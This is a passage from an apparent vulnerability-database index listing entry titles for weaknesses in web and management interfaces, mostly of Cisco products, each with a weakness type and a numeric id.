Web-based Management Interface sql injection [167944] Cisco Webex Meetings Web-based Management Interface redirect [167938] Cisco WebEx Teams Messaging Interface clickjacking [167936] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [167935] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [167359] TP-LINK TL-WR840N 6_EU_0.9.1_4.16 Web Interface oal_ipt_addBridgeIsolationRules os command injection [161773] Cisco Unified Communications Manager Web-based Management Interface cross site request forgery [161771] Cisco Unity Connection Web Management Interface directory traversal [161770] Cisco Hosted Collaboration Mediation Fulfillment Web-based Interface cross site request forgery [161762] Cisco FirePOWER Management Center Web-based Management Interface weak authentication [161749] Cisco Web Security Appliance Web-based Management Interface cross site scripting [161748] Cisco Unified Communications Manager Web-based Management Interface information disclosure [161746] Cisco Small Business RV Series Router Web-based Management Interface privilege escalation [161282] McAfee Web Gateway up to 9.2.0 REST Interface privilege escalation [161008] SAP BusinessObjects Business Intelligence Platform 4.1/4.2 Web Intelligence HTML Interface Stored cross site scripting [161005] SAP Business Intelligence Platform Web Intelligence HTML Interface privilege escalation [160990] Palo Alto PAN-OS 10.0.0 Management Web Interface memory corruption [160987] Palo Alto PAN-OS up to 8.1.15/9.0.9/9.1.3/10.0.0 Management Web Interface denial of service [160984] Palo Alto PAN-OS up to 8.1.5/9.0.8 Management Web Interface Reflected cross site scripting [160746] Cisco Email Security Appliance Web-based Management Interface information disclosure [160745] Cisco Email Security Appliance Web-based Management Interface privilege escalation [160735] Cisco RV340 Web-based Management Interface memory corruption [160734] Cisco RV340 Web-based Management Interface memory corruption [160022] oVirt up to 4.4 Web Interface Reflected cross site scripting [160007] Cisco Webex Meetings Desktop App User Interface privilege escalation [160006] Cisco Webex Meetings Desktop App User Interface privilege escalation [160003] Cisco UCS Director Web-based Management Interface cross site scripting [160002] Cisco Webex Meeting Web-based Management Interface cross site scripting [158881] Cisco ASA/Firepower Threat Defense Web Services Interface privilege escalation [158707] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface privilege escalation [158706] Cisco RV110W/RV215W Web-based Management Interface memory corruption [158705] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption [158702] Cisco RV110W/RV215W Web-based Management Interface privilege escalation [158701] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption [158700] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption [158699] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface privilege escalation [158310] Oracle WebCenter Sites 12.2.1.3.0/12.2.1.4.0 Advanced User Interface cross site scripting [157834] Sophos XG Firewall up to 18.0 MR1 Admin Web Interface sql injection [157626] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [157554] Cisco Identity Services Engine Web-based Management Interface cross site scripting [156908] Cisco IP Phone 7800/IP Phone 8800 Web-based Management Interface information disclosure [156899] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156898] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156897] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156896] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156895] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156894] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156893] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156892] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156891] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156890] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156889] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption [156888] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation [156887] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation [156886] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation [156885] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation [156884] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation [156883] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation [156882] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption [156881] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption [156876] Cisco UCS Director Web-based Management Interface directory traversal [156766] IBM Spectrum Protect up to 8.1.9.1 Web User Interface weak authentication [156761] IBM Spectrum Protect up to 8.1.9.1 Web User Interface privilege escalation [156509] Palo Alto PAN-OS up to 7.1.25/8.1.12 Web Management Interface privilege escalation [156477] CipherMail Community Gateway Web Interface privilege escalation [156110] ClearPass Policy Manager up to 6.7.13/6.8.5/6.9.0 Web UI Administrative Interface privilege escalation [156109] ClearPass Policy Manager up to 6.7.13/6.8.5/6.9.0 Web UI Administrative Interface privilege escalation [156108] ClearPass Policy Manager up to 6.7.13/6.8.5/6.9.0 Web Interface weak authentication [156074] Cisco Prime Infrastructure Web-based Management Interface sql injection [156051] Cisco IOS XE Web-based User Interface privilege escalation [156050] Cisco IOS XE Web-based User Interface privilege escalation [156049] Cisco IOS XE Web-based User Interface Code [155640] Trend Micro InterScan Web Security Virtual Appliance 6.5 Web Interface cross site scripting [155542] Cisco Prime Collaboration Provisioning Web-based Management Interface sql injection [155223] Palo Alto PAN-OS up to 7.1.25/8.0.20/8.1.12/9.0.5 Management Web Interface DOM-Based cross site scripting [154825] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [154823] Cisco FirePOWER Management Center Web Interface Redirect [154810] Cisco ASA/Firepower Threat Defense Web Services Interface information disclosure [154809] Cisco Hosted Collaboration Mediation Fulfillment Web-based Management Interface XML External Entity [154799] Cisco ASA/Firepower Threat Defense Web Services Interface directory traversal [153142] SAP Business Intelligence Platform 4.1/4.2 Web Intelligence HTML Interface cross site scripting [151867] Cisco SD-WAN vManage Web-based Management Interface cross site scripting [150871] Cisco Prime Collaboration Provisioning Web-based Management Interface information disclosure [150870] Cisco Prime Collaboration Provisioning Web-based Management Interface cross site scripting [150868] Cisco TelePresence Management Suite Web-based Management Interface cross site scripting [150864] Cisco Email Security Appliance Web-based Management Interface privilege escalation [150863] Cisco Identity Services Engine Web-based Management Interface cross site scripting [150811] Netgear WNR1000V4 1.1.0.54 Web Management Interface setup.cgi cross site scripting [150810] Netgear WNR1000V4 1.1.0.54 Web Management Interface setup.cgi privilege escalation [150362] Cisco Cloud Web Security Web-based Management Interface sql injection [150212] Lenovo EZ Media / Backup Center/ix2/ix2-dl up to 4.1.406.34763 Web Interface Redirect [150094] Palo Alto PAN-OS up to 8.1.11/9.0.5 Web Interface unknown vulnerability [149719] Cisco Identity Services Engine up to 2.6.x Web-based Management Interface Stored cross site scripting [149360] Cisco Unity Connection Web-based Management Interface Stored cross site scripting [149354] Cisco Crosswork Change Automation Web-based Management Interface cross site scripting [149349] Cisco IP Phone 6800/IP Phone 7800/IP Phone 8800 Web-based Interface cross site scripting [149348] Cisco Webex Video Mesh Web-based Management Interface privilege escalation [149347] Cisco UCS Director Web-based Management Interface Log weak authentication [149344] Cisco Identity Services Engine Web-based Management Interface privilege escalation [149342] Cisco SD-WAN Solution Web Interface sql injection [148331] Jinan USR IOT USR-WIFI232 Low Power WiFi Module 1.2.2 Web Interface cross site scripting [146347] Cisco Small Business RV Series Router Web-based Management Interface privilege escalation [146345] Cisco Webex Event Center Web Interface weak authentication [146342] Cisco Unified Communications Manager Web-based Management Interface sql injection [146340] Cisco Unified Communications Domain Manager Web-based Management Interface cross site scripting [146336] Cisco AsyncOS/Web Security Appliance Web Management Interface privilege escalation [146330] Cisco Wireless LAN Controller Software Web Interface privilege escalation [146329] Cisco Small Business RV Series Router Web-based Management Interface privilege escalation [145574] Netgear WNDR4700 1.0.0.34 Management Web Interface Credentials information disclosure [143813] Cisco Identity Services Engine Web-based Management Interface weak authentication [143812] Cisco Identity Services Engine Web-based Management Interface Stored cross site scripting [143811] Cisco FirePOWER Management Center Web-based Management Interface Stored cross site scripting [143806] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [143805] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [143804] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [143779] Cisco TelePresence Video Communication Server Web-based Management Interface cross site scripting [143775] Cisco Identity Services Engine Web-based Management Interface cross site scripting [143774] Cisco Identity Services Engine Web-based Management Interface Stored cross site scripting [143458] D-Link DIR-412 A1-1.14WW Web Interface log_get.php weak authentication [143406] D-Link DIR-868L/DIR-817LW Web Interface getcfg.php Credentials unknown vulnerability [142886] Cisco Unified Communications Manager Web-based Interface cross site request forgery [142883] Cisco Unified Communications Manager Web-based Interface privilege escalation [142871] Cisco Unified Communications Manager Web-based Interface cross site scripting [142870] Cisco Unified Communications Manager Web-based Interface cross site scripting [142868] Cisco Prime Infrastructure Web-based Management Interface cross site scripting [142867] Cisco Prime Infrastructure Web-based Management Interface cross site scripting [142866] Cisco Unified Communications Manager Web-based Interface XML External Entity [142865] Cisco Unified Communications Manager Web-based Interface sql injection [142864] Cisco Unified Communications Web-based Interface cross site scripting [142853] Cisco FirePOWER Management Center Web-based Management Interface directory traversal [142851] Cisco FirePOWER Management Center Web-based Management Interface privilege escalation [142848] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142847] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142846] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142845] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142844] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142843] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142842] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142841] Cisco FirePOWER Management Center Web-based Management Interface sql injection [142834] Cisco Identity Services Engine Web-based Management Interface cross site scripting [142275] Cisco IOS XE Web-based User Interface privilege escalation [142274] Cisco IOS XE Web-based User Interface privilege escalation [141302] Nagios XI up to 5.6.5 Web Interface profile.php privilege escalation [141291] Canon PRINT jp.co.canon.bsd.ad.pixmaprint 2.5.5 on Android Administrator Web Interface information disclosure [141272] Cisco Identity Services Engine Web-based Management Interface cross site scripting [140698] Fortinet FortiOS up to 6.2.0 Admin Web Interface information disclosure [140570] Cisco Integrated Management Controller Web-based Management Interface weak authentication [140568] Cisco UCS Director/UCS Director Express for Big Data Web-based Management Interface weak authentication [140567] Cisco Integrated Management Controller Web-based Management Interface weak authentication [140566] Cisco Integrated Management Controller Web-based Management Interface privilege escalation [140531] Cisco IOS XE NGWC Web-based Management Interface cross site request forgery [139684] Cisco WebEx Meetings Server Web-based Management Interface Redirect [139680] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [139665] Cisco ASA Web-based Management Interface privilege escalation [139272] 3proxy up to 0.8.12 Admin Interface webadmin.c memory corruption [138277] Cisco Identity Services Engine up to 2.6.0 Sponsor Portal Web Interface sql injection [138276] Cisco Identity Services Engine Web-based Management Interface cross site scripting [137428] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [137427] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [137263] Moxa OnCell G3470A-LTE up to 1.6 Build 18021314 Web Interface denial of service [137262] Moxa OnCell G3100-HSPA up to 1.6 Build 17100315 Web Interface memory corruption [137259] Moxa OnCell G3100-HSPA up to 1.5 Build 17042015 Web Interface denial of service [136772] Dell EMC Avamar ADMe Web Interface 1.0.50/1.0.51 privilege escalation [136740] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation [136739] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation [136731] Cisco RV110W Wireless-N VPN Firewall Web-based Management Interface privilege escalation [136458] BD Alaris Gateway Web Browser User Interface privilege escalation [136210] Moxa AWK-3121 1.14 Web Interface iw_webSetParameters cross site request forgery [136036] Cisco Enterprise Chat/Email Center Web-based Management Interface cross site scripting [136035] Cisco WebEx Meetings Server Web-based Management Interface information disclosure [135677] Yeahlink Ultra-elegant IP Phone SIP-T41P 66.83.0.35 Diagnostics Web Interface directory traversal [135676] Yeahlink Ultra-elegant IP Phone SIP-T41P 66.83.0.35 Web Interface cross site request forgery [135136] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface SQL sql injection [135135] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface SQL sql injection [135134] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface privilege escalation [135133] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface privilege escalation [135132] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface privilege escalation [135131] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface directory traversal [135130] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface directory traversal [135129] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface directory traversal [135069] Cisco Video Surveillance Manager Web-based Management Interface directory traversal [134669] Cisco IOS XE Web-based User Interface privilege escalation [134622] Virgin Media Wireless Router 3.0 Web Interface Persistent denial of service [134367] Cisco Prime Collaboration Assurance Web-based Management Interface cross site scripting [134353] Cisco ASA Web-based Management Interface cross site request forgery [134038] TIBCO ActiveMatrix BPM Administrator Web Interface cross site request forgery [133805] Cisco FirePOWER Management Center 6.2.3/6.3.0/6.4.0 Web-based Management Interface cross site scripting [133802] Cisco Wireless LAN Controller up to 8.3/8.5/8.8 Web-based Management Interface cross site request forgery [133796] Cisco up to X12.5.0 Web-based Management Interface cross site request forgery [133793] Cisco Identity Services Engine 2.1 Web-based Management Interface cross site scripting [133792] Cisco Identity Services Engine 2.1 Web Interface denial of service [133778] Cisco Wireless LAN Controller up to 8.1/8.5 Web-based Interface Hijacking weak authentication [133251] HPE Integrated Lights-Out 5 up to 1.39 Web User Interface cross site scripting [132764] CUPS up to 2.2.9 on Linux Web Interface information disclosure [132103] Cisco IP Phone 8800 Web-based Management Interface privilege escalation [132102] Cisco IP Phone 8800 Web-based Management Interface directory traversal [132101] Cisco IP Phone 8800 Web-based Management Interface cross site request forgery [132100] Cisco IP Phone 8800 Web-based Management Interface privilege escalation [132099] Cisco IP Phone 7800/IP Phone 8800 Web-based Management Interface privilege escalation [131934] Solarwinds Serv-U FTP Server 15.1.6.25 Web Management Interface Reflected cross site scripting [131571] Cisco Enterprise Chat/Email 11.6(1) Web-based Management Interface cross site scripting [130682] Cisco Identity Services Engine Web-based Management Interface cross site scripting [130638] Cisco TelePresence Conductor up to XC4.3.3 Web Interface privilege escalation [130634] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [130632] Cisco TelePresence Management Suite Web-based Management Interface cross site scripting [130566] CA Automic Workload Automation 12.0 Automic Web Interface Persistent cross site scripting [130343] Palo Alto PAN-OS up to 7.1.21/8.0.14/8.1.5 Management Web Interface cross site scripting [130247] Cisco WebEx Meetings Server Web-based Management Interface cross site scripting [130246] Cisco RV320/RV325 Web-based Management Interface privilege escalation [130245] Cisco RV320/RV325 Web-based Management Interface privilege escalation [130222] Cisco Prime Infrastructure Web-based Management Interface cross site scripting [130221] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [130127] Cisco Identity Services Engine Administrative Web Interface privilege escalation [129744] Cisco Identity Services Engine Web-based Management Interface Reflected cross site scripting [129743] Cisco Identity Services Engine Web-based Management Interface Stored cross site scripting [129043] Cisco TelePresence Management Suite Web-based Management Interface cross site scripting [128999] Cisco Prime Infrastructure Web-based Management Interface cross site scripting [128990] Cisco Unified Communications Manager Web-based Management Interface Credentials privilege escalation [128368] Cisco ASA Web Management Interface privilege escalation [126586] Cisco Video Surveillance Media Server Web-based Management Interface privilege escalation [125799] SV3C L-SERIES HD CAMERA Web Interface Redirect [125797] SV3C L-SERIES HD CAMERA V2.3.4.2103-S50-NTD-B20170508B Web Interface Technical information disclosure [125728] Cisco Prime Collaboration Assurance Web-based Management Interface cross site request forgery [125710] Cisco Wireless LAN Controller Software Web-based Interface directory traversal [125708] Cisco Wireless LAN Controller Web-based Interface privilege escalation [125706] Cisco Wireless LAN Controller Web-based Interface cross site scripting [125668] D-Link DWR-111 Web Interface directory traversal [125227] Siemens SIMATIC S7-1200 up to 4.2.2 Web Interface cross site request forgery [124937] Cisco WebEx Training Center Web-based Management Interface cross site scripting [124936] Cisco Unified IP Phone Web-based Management Interface cross site scripting [124928] Cisco Unity Connection Web-based Interface Stored cross site scripting [124927] Cisco Identity Services Engine Web-based Management Interface privilege escalation [124926] Cisco Identity Services Engine Web-based Management Interface privilege escalation [124908] Cisco UCS Director Web-based Management Interface Stored cross site scripting [124907] Cisco Integrated Management Controller Web Interface information disclosure [124906] Cisco Integrated Management Controller Web Interface denial of service [124904] Cisco Hosted Collaboration Mediation Fulfillment Web-based Management Interface cross site request forgery [124903] Cisco Cloud Services Platform 2100 Web-based Management Interface cross site scripting [124895] Cisco Prime Collaboration Provisioning Administrative Web Interface privilege escalation [124861] Cisco IOS XE Web User Interface memory corruption [124852] Cisco Prime Collaboration Assurance Web-based Management Interface cross site scripting [124849] Cisco Cloud Services Platform 2100 Web-based Management Interface privilege escalation [124838] Cisco Meeting Server Web-based Management Interface cross site request forgery [124828] Cisco RV110W/RV130W/RV215W Web-based Management Interface directory traversal [124827] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation [124826] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation [124825] Cisco RV110W/RV130W/RV215W Web-based Management Interface memory corruption [124652] TP-LINK TL-WRN841N 0.9.1 4.16 v0348.0 Web Interface cross site request forgery [124651] TP-LINK TL-WRN841N 0.9.1 4.16 v0348.0 Web Interface privilege escalation [124650] TP-LINK TL-WRN841N 0.9.1 4.16 v0348.0 Web Interface privilege escalation [124237] Foscam C1 Indoor HD Camera 2.52.2.43 Web Management Interface memory corruption [124233] Foscam C1 Indoor HD Camera 2.52.2.43 Web Management Interface privilege escalation [122978] Palo Alto PAN-OS up to 8.1.2 Management Web Interface privilege escalation [122482] Cisco Identity Services Engine Web-based Management Interface cross site request forgery [122481] Cisco Unified Communications Manager Web-based Management Interface Reflected cross site scripting [122478] Cisco Web Security Appliance Web-based Management Interface Reflected cross site scripting [122462] Foreman up to 1.12.x Web Interface Stored cross site scripting [122134] Dahua IP Camera Web Interface /usr/bin/sonia memory corruption [122098] McAfee Web Gateway 7.8.1.x Administrative Interface privilege escalation [121501] Cisco Web Security Appliance Web-based Management Interface Reflected cross site scripting [121371] Cisco IP Phone 6800/7800/8800 Series Web-based User Interface privilege escalation [120478] ADB Broadband Router on Epicentro Web Interface privilege escalation [119783] Cisco Meeting Server Web Admin Interface privilege escalation [119782] Cisco FirePOWER Management Center Web-based Management Interface cross site request forgery [119781] Cisco Unified Communications Domain Manager Web-based Management Interface cross site request forgery [119780] Cisco Unified Communications Manager Web-based Management Interface cross site request forgery [119766] Cisco FXOS/Firepower 4100/Firepower 9300 Web-based User Interface directory traversal [119243] Cisco Identity Services Engine Web-based Management Interface cross site scripting [119235] Cisco Prime Collaboration Provisioning 12.1 Web Management Interface privilege escalation [117103] Catapult UK Cookie Consent Plugin up to 2.3.9 on WordPress Web Interface Persistent cross site scripting [117046] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [117045] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [116891] Cisco WebEX Connect IM Web Interface cross site scripting [116875] Cisco ASA Web-based Management Interface cross site scripting [115192] Cisco IOS XE Web-based User Interface privilege escalation [115189] Cisco IOS XE Web-based User Interface cross site scripting [115187] Cisco IOS XE Web-based User Interface cross site scripting [115186] Cisco IOS XE Web-based User Interface cross site scripting [115158] Cisco IOS XE 16.1.1 Web-based User Interface privilege escalation [114214] Cisco Unified Computing System Web-based Management Interface cross site scripting [114213] Cisco Secure Access Control Server up to 5.8 Patch 8 Web-based User Interface information disclosure [114211] Cisco Identity Services Engine Web-based Management Interface cross site request forgery [114210] Cisco Identity Services Engine Web-based Management Interface cross site request forgery [114207] Cisco Identity Services Engine Web-based Management Interface cross site scripting [114181] SO Connect SO WIFI Hotspot Web Interface up to 139 Redirect [113943] Parallels Remote Application Server 15.5 Build 16140 Web Interface RASHTML5Gateway/ directory traversal [113678] Cisco Unified Communications Manager Web-based Management Interface Reflected cross site scripting [113671] Cisco UCS Director Software Web Management Interface cross site request forgery [112984] Cisco RV132W 1.0.1.11 Web Interface privilege escalation [112333] PowerDNS Recursor up to 4.0.6 Web Interface cross site scripting [112211] Cisco Prime Infrastructure Web Interface Redirect [112207] Cisco Web Security Appliance Web-based Management Interface Reflected cross site scripting [112205] Cisco Identity Services Engine Web-based Management Interface DOM-Based cross site scripting [111731] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [110916] XiongMai IP Camera/DVR NetSurveillance Web Interface memory corruption [110490] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13 Web Interface privilege escalation [110488] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13/8.0.5 Web Interface privilege escalation [110084] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [110081] Cisco Secure Access Control System Web Interface information disclosure [110077] Cisco UCS Central Software Web-based Management Interface cross site scripting [110076] Cisco UCS Central Software Web-based Management Interface cross site scripting [108906] Cisco WebEx Meetings Server Web Interface cross site scripting [108556] Axigen Mail Server up to 8.x Webmail Interface actions.hsp cross site scripting [108276] Cisco WebEx Meeting Center Web Interface cross site scripting [108275] Cisco WebEx Meetings Server Web Interface cross site scripting [108267] Cisco IOS XE Web Interface cross site scripting [108090] Oracle iPlanet Web Server 7 Admin Graphical User Interface privilege escalation [107491] Cisco ASA Web-based Management Interface cross site scripting [107490] Cisco Meeting Server Web Admin Interface privilege escalation [106219] Cisco FirePOWER Management Center Web-based Management Interface Reflected cross site scripting [105423] Cisco WebEx Meetings Server 1.0.0.30/1.0.0.33/1.0.1.9/1.0.1.16 Web Interface information disclosure [105421] Cisco Prime Infrastructure 3.2(0.0) Administrative Web Interface privilege escalation [104946] Unitrends Backup up to 9.x API Storage Web Interface weak authentication [104910] Cisco ASA 9.1(6.11)/9.4(1.2) Web-based Management Interface cross site scripting [104909] Cisco ASA 9.5(1) Web-based Management Interface cross site scripting [104900] Cisco ASA 9.3(3)/9.6(2) Web Interface User information disclosure [104381] Palo Alto PAN-OS up to 6.1.17/7.0.15/7.1.10/8.0.2 Management Web Interface cross site scripting [104326] Cisco Web Security Appliance Web Interface privilege escalation [103732] Anti-virus Kaspersky Anti-virus up to 8.0.4. Web Interface action information disclosure [103730] Kaspersky Anti-Virus up to 8.0.4 on Linux Web Interface 7PK Security Features [103396] Cisco Identity Services Engine 1.3(0.909)/2.1(0.800) Web-based Management Interface cross site scripting [103348] D-Link DIR-615 up to 20.12 Web Interface Form2File.htm cross site request forgery [103014] Cisco Identity Services Engine 2.1(102.101) Web Application Interface Stored cross site scripting [103013] Cisco Prime Infrastructure/Programmable Network Manager 2.0(4.0.45B)/3.1(1) Web-based Management Interface DOM-based cross site scripting [103012] Cisco Prime Infrastructure/Programmable Network Manager 2.0(4.0.45B)/3.1(1) Web-based Management Interface Reflected cross site scripting [103010] Cisco Identity Services Engine 2.1(0.800) Web-based Management Interface Reflected cross site scripting [102926] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface memory corruption [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd privilege escalation [102924] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102923] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102922] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102921] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102920] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102919] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102865] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102864] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102863] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102721] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface memory corruption [102720] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface memory corruption [102719] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface directory traversal [102718] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102717] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation [102716] Foscam C1 Indoor HD Camera Web Management Interface memory corruption [102277] Cisco Prime Collaboration Assurance 11.5(0)/11.6 Web-based Management Interface cross site request forgery [101865] Juniper Junos Space up to 16.1 Administrative Web Interface privilege escalation [101864] Juniper Junos Space up to 16.1 Administrative Web Interface privilege escalation [101565] Cisco Unified Communications Manager up to 10.5 Web-based Management Interface cross site scripting [101474] Cisco Prime Collaboration Provisioning up to 12.0 Web Interface privilege escalation [101473] Cisco Prime Collaboration Provisioning up to 10.6 Web Interface information disclosure [101440] McAfee Network Data Loss Prevention 9.3.x Web Interface Username information disclosure [100804] Palo Alto PAN-OS up to 7.1.8 Management Web Interface information disclosure [100719] Palo Alto PAN-OS up to 6.1.16/7.0.14/7.1.8 Management Web Interface information disclosure [99763] Palo Alto PAN-OS up to 7.1.8 Management Web Interface privilege escalation [99761] Palo Alto PAN-OS up to 7.0.13/7.1.8 Web Interface privilege escalation [99431] Cisco Unified Communications Manager 12.0(0.98000.452) Web-based Management Interface Reflected cross site scripting [99429] Cisco Unified Communications Manager Manager Web Interface sql injection [99427] Cisco Prime Infrastructure/Evolved Programmable Network up to 3.2(0.0) Web Interface information disclosure [99357] Cisco Wireless LAN Controller 8.3.102.0 Web Management Interface privilege escalation [98298] Juniper Junos Space up to 15.2 Web Interface weak authentication [98254] Cisco UCS Director 6.0(0.0) Web-based Management Interface cross site scripting [97333] Palo Alto PAN-OS up to 6.1.15/7.0.17/7.1.7 Management Web Interface Persistent cross site scripting [97332] Palo Alto PAN-OS up to 6.1.15/7.0.17/7.1.7 Management Web Interface File information disclosure [97201] Cisco Prime Collaboration Assurance up to 11.0/11.1/11.5 Web Management Interface cross site scripting [97198] Cisco Secure Access Control System 5.8(2.5) Web Interface information disclosure [97197] Cisco Secure Access Control System 5.8(2.5) Web Interface Redirect [97196] Cisco Secure Access Control System 5.8(2.5) Web User Interface privilege escalation [97195] Cisco Secure Access Control System 5.8(2.5) Web Interface DOM cross site scripting [97194] Cisco Meeting Server up to 2.1.1 Web Bridge Interface privilege escalation [97189] Cisco Unified Communications Manager 12.0(0.98000.280) Web Management Interface cross site scripting [97188] Cisco Unified Communications Manager 11.0(1.10000.10)/11.5(1.10000.69) Web Management Interface cross site scripting [96245] Sophos Web Appliance Remote/Secure Web Gateway Server up to 4.2.1.3 Web Admin Interface MgrDiagnosticTools.php exec privilege escalation [95999] Cisco IOS/IOx on IR829/IR809/IE4K/CGR1K Web-based Management Interface information disclosure [93741] Siemens SIMATIC S7-400 Web Interface cross site request forgery [93677] Palo Alto PAN-OS up to <=5.0.19 Management Web Interface memory corruption [93300] Cisco Hosted Collaboration Mediation Fulfillment 11.5(1) Web Interface cross site request forgery [93040] Puppet Enterprise Web Interface User information disclosure [93039] Puppet Enterprise Web Interface Redirect [91512] Cisco Hosted Collaboration Mediation Fulfillment up to 10.6(3) Web Interface directory traversal [90588] Cisco X8.5.2 Administrative Web Interface privilege escalation [90585] Cisco RV180/RV180W Web Interface directory traversal [89556] U.S.Robotics Router 1.04 08 Web Interface /menu.htm weak encryption [89467] Cisco WebEx Meetings Server 2.6 Admin Interface cross site scripting [89443] Cisco IOS Web Interface privilege escalation [89436] Netgear MR814 Web Interface information disclosure [89435] Netgear WGR614 Web Interface information disclosure [89222] Netscape Enterprise Web Server Administrative Interface weak authentication [89192] IBM Tivoli Directory Server 4.1 Web Interface cross site scripting [88817] Cisco Prime Infrastructure up to 3.1.0 Admin Web Interface privilege escalation [88746] EMC Avamar up to 7.1.2/7.2.1 Web-Restore Interface privilege escalation [88725] Sambar Server Pro 5.2/5.3/6.0 b1 Webmail Interface Credentials weak encryption [88432] Netgear ProSafe VPN Firewall 1.0/1.1/1.2/1.3 Web Interface denial of service [88039] Cisco RV110W/RV130W/RV215W Web Management Interface memory corruption [88038] Cisco RV110W/RV130W/RV215W Web Management Interface cross site scripting [88037] Cisco RV110W/RV130W/RV215W Web Management Interface privilege escalation [87643] Cisco FirePOWER Management Center up to 6.0.0.1 Web Interface privilege escalation [87621] Cisco Prime Infrastructure up to 3.0 API Web Interface privilege escalation [82449] Juniper ScreenOS up to 6.3.0r20 Administrative Web Service Interface privilege escalation [82277] Palo Alto PAN-OS up to 5.0.17/5.1.10/6.0.12/6.1.9/7.0.2H1 Management Web Interface privilege escalation [81878] Fortinet FortiOS Web User Interface cross site scripting [81779] Trend Micro OfficeScan up to 3.51 Web Interface privilege escalation [81012] Citrix Netscaler Application Delivery Controller up to 10.5 Administrative Web Interface 7PK Security Features [80701] Cisco RV220W Web-based Management Interface sql injection [92714] Palo Alto PAN-OS 5.0.x/5.1.12/6.0.x/6.1.x Web Interface denial of service [79293] Cisco Firepower Extensible Operating System 1.1(1.160) on Firepower 9000 Web Interface privilege escalation [79255] Cisco Firepower Extensible Operating System 1.1(1.160) Web Interface privilege escalation [79015] Cisco Unified Computing System 2.2(5b)A on Blade Web Interface information disclosure [78906] Cisco Secure Access Control Server 5.7(0.15) Web Interface cross site scripting [78905] Cisco Secure Access Control Server 5.7(0.15) Web Interface cross site scripting [77760] Symantec Web Gateway 5.2.2 Interface privilege escalation [77355] 